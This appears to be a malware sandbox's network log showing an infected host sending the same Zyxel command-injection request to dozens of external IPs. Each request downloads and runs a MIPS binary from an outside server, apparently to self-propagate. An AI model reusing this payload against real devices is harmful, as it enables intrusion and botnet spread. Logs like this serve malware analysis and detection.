                                                Jan 12, 2024 18:16:26.527323008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5198192.168.2.235697498.62.48.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527368069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5199192.168.2.235534459.135.88.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527405977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5200192.168.2.235725281.49.51.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527420998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5201192.168.2.2333936174.168.98.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527477980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5202192.168.2.2346988221.46.230.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527512074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5203192.168.2.233890681.182.98.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527563095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5204192.168.2.2333204204.213.54.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527599096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5205192.168.2.2357236154.187.175.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527656078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5206192.168.2.2360606137.158.80.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527663946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5207192.168.2.2341902116.35.246.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527705908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5208192.168.2.2357272105.173.131.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527764082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5209192.168.2.234753441.46.107.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527791023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5210192.168.2.2338796219.84.175.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527826071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5211192.168.2.235211431.15.36.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527864933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5212192.168.2.235328048.80.170.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527904987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5213192.168.2.233773262.176.247.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527944088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5214192.168.2.2347088136.195.239.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.527968884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5215192.168.2.2337790135.224.231.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528011084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5216192.168.2.233461832.102.62.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528057098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5217192.168.2.2360844191.223.223.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528091908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5218192.168.2.2332888190.255.249.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528116941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5219192.168.2.235336291.245.21.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528157949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5220192.168.2.2343268140.214.170.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528177977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5221192.168.2.2352916141.98.172.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528227091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5222192.168.2.2344142125.226.153.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528264046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5223192.168.2.2350648163.0.6.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528318882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5224192.168.2.234790660.27.111.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528331995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5225192.168.2.2354236202.126.187.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528400898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5226192.168.2.2355636148.45.50.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528434038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5227192.168.2.2344092150.68.136.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528461933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5228192.168.2.2348616123.7.73.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528501987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5229192.168.2.234029890.3.74.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528547049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5230192.168.2.233329675.242.76.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528570890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5231192.168.2.2344884208.95.16.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528598070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5232192.168.2.2350178102.229.108.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528661966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5233192.168.2.2344010219.2.188.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528678894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5234192.168.2.235961268.46.173.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528732061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5235192.168.2.236036058.58.120.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528758049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5236192.168.2.235671854.178.34.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528796911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5237192.168.2.2353336137.73.131.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528820992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5238192.168.2.2334436207.58.114.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528871059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5239192.168.2.2352430154.40.187.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528915882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5240192.168.2.2352226163.64.46.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528948069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5241192.168.2.233916018.171.129.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.528994083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5242192.168.2.2349496102.130.43.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529025078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5243192.168.2.2344788156.8.56.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529056072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5244192.168.2.2348798187.34.226.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529109955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5245192.168.2.233400494.222.10.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529143095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5246192.168.2.233769846.125.197.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529182911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5247192.168.2.2353798129.204.34.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529222012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5248192.168.2.235927691.45.228.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529257059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5249192.168.2.2337804104.235.48.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529289961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5250192.168.2.235747871.6.101.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529316902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5251192.168.2.235574213.20.140.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529365063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5252192.168.2.2342406104.149.53.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529392958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5253192.168.2.2340632216.72.227.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529411077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5254192.168.2.2349592132.160.129.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529464960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5255192.168.2.2348310134.143.123.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529515982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5256192.168.2.2335710134.88.72.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529548883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5257192.168.2.2345958123.167.140.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529601097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5258192.168.2.2335096172.242.248.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529637098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5259192.168.2.2354984133.9.165.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:26.529663086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5260192.168.2.2346278221.152.31.4443
                                                TimestampBytes transferredDirectionData
